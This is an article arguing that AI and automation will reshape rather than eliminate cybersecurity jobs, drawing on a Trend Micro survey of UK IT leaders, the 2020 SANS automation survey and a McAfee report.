Addressing the fear of AI in cybersecurity roles

AI in cybersecurity

Fear of automation has been present since the first industrial revolution, and as we slowly edge closer toward entering its fourth iteration, that very same fear has lingered and begun to creep up once more.

Only now it has cozied up to another worthy ally that could unearth age old fears of job loss: artificial intelligence (AI).

With technological advancements making headway every day, it seems there’s an accompanying alarm that keeps ringing; a warning of a future in which robots will be able to do everything humans can, only better, cheaper, and for longer.

A study conducted by Trend Micro, a Japan-based cybersecurity firm, that interviewed 500 UK IT decision-makers found that many IT leaders are concerned that their jobs will be replaced by AI in the next ten years.

The study suggests that there is a strongly held belief that jobs within the cybersecurity space will become obsolete due to automation, with no need for human automation.

“More than two-fifths (41 percent) believe that AI will replace their role by 2030, while merely 9 percent of the survey respondents said they were confident that AI would ‘definitely’ not replace their jobs within the next ten years,” the study noted.

While the study highlighted people’s lingering fear of being replaced by a simple algorithm, this doesn’t seem to be the case on the ground.

Let’s jump right in and bust this myth from the get-go.

While IT leaders seem to be worry about the possibility of losing their profession in the next decade, many have jumped in to turn out the panic alarm.

Even, Trend Micro’s Technical Director, Bharat Mistry, wrote within the study that “we need to be realistic about the future. While AI is a useful tool in helping us to defend against threats, its value can only be harnessed in combination with human expertise.”

He added the people should not be worried about their jobs becoming obsolete, since “AI and automation can help us to alleviate the problems caused by critical skills shortages.”

While proponents of AI and automation view them as the harbingers of a golden age free of paper-pushing, mundane and repetitive tasks, AI will not come after your job.

One of the main reasons why cybersecurity experts need not fret about their job security is simply due to cyber criminals beginning to adopt AI within their arsenal of attacks, transforming the battle ground into an online arms race where businesses and individuals attempt to stay one step ahead of each other.

With that, there needs to be cooperation between humans and their algorithms to fend off bad actors, regardless of how sophisticated their approaches might be.

According to the “2020 SANS Automation and Integration Survey,” cybersecurity teams aren’t going away anytime soon.

“Automation doesn’t appear to negatively affect staffing,” the authors concluded, after surveying more than 200 cybersecurity professionals from companies of all sizes over a wide cross-section of industries.

What they found, in fact, suggested the opposite: Companies with medium or greater levels of automation actually have higher staffing levels than companies with little automation.

While automation could theoretically eliminate almost three million cybersecurity jobs before a single one of them contemplates a career change, one needs to question of AI and automation living up to all its potential.

“As we’ve seen with a number of ‘revolutionary’ cybersecurity technologies, many fall short of the hype, at least in the early days,” says a report by U.S. cybersecurity software company, McAfee.

The task of automation and AI currently enjoy their very own shortcomings; the first being that they cannot deploy themselves, thus, a human touch is required to tailor the solution to the business’ needs and ensure that’s functioning correctly.

Even when they’re put in place correctly, AI and automation cannot be solely reliable on covering an organization’s online security just like that, since without lack of human judgment that filters and investigates every claim, these systems can unearth many false positives.

In terms of false negatives, AI is great at spotting what it’s programmed to spot, thus, making it increasingly unreliable at detecting threats and illicit activities it hasn’t been specifically instructed to look for.

“Machine learning is beginning to overcome this hurdle, but the operative word here is still ‘machine’—when significant threats are surfaced, the AI has no way of knowing what this means for the business it’s working for, as it lacks both the context to fully realize what a threat means to its parent company, and the ability to take into consideration everything a person would,” the McAfee report explained.

Humans will still be needed at the helm to analyze risks and potential breaches, and make intuitive, business-critical decisions.

Also, these automated and AI-driven systems instantly become obsolete once new types of attacks are created and deployed against them, since they cannot evolve without the guiding hands of humans.

In parallel, these automated systems cannot hire and train personnel, select vendors, conduct compliance or perform any creative task set before them.

“No automated system, no matter how sophisticated, is going to know when new laws, company regulations, and rules are passed, and no system will be able to adjust to such changes without human intervention,” the report explained.

It is important to note that hackers and cyber criminals have already demonstrated their ability to hack into automated systems; thus, leaving the algorithm to fend for itself, without a human quickly responding to the threat, sensitive data could be at risk of being breached or stolen.

McAfee’s report highlighted that AI and automation will not obliterate cybersecurity roles but would rather redefine and reshape the uses of those roles in other means.

According to SANS, implementation of effective automation often requires an initial surge in staff to get the kinks worked out—but it is almost invariably accompanied by a redirection, not reduction, of the existing workforce.

With that in mind, we need to stop ringing the panic bell of joblessness whenever emerging technologies start hitting the mainstream. We need to remember that without the guidance and instruction of humans, these technologies will not be able to perform as optimally as they were designed to be.